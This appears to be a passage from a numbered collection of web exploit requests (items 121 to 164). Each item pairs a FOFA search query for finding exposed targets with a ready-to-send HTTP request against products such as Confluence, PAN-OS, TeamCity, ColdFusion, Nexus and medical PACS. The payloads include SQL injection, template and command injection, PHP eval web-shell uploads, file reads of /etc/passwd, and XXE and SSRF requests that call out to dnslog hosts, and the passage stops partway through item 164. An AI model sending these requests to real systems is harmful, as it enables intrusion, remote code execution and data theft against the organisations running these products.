-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--


Uploaded file path: boot/web/upload/weblogo/1.php

122. Beijing Byzoro Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user has been created, log in to the admin backend directly; system commands can then be executed.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 cloud mall file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Kelixun communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:10050
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwell fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage navigation page file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. INFINITT (英飞达) medical imaging PACS WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>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</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓全智能停车收费系统 Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰多媒体信息发布系统 QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团分销管理系统 ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
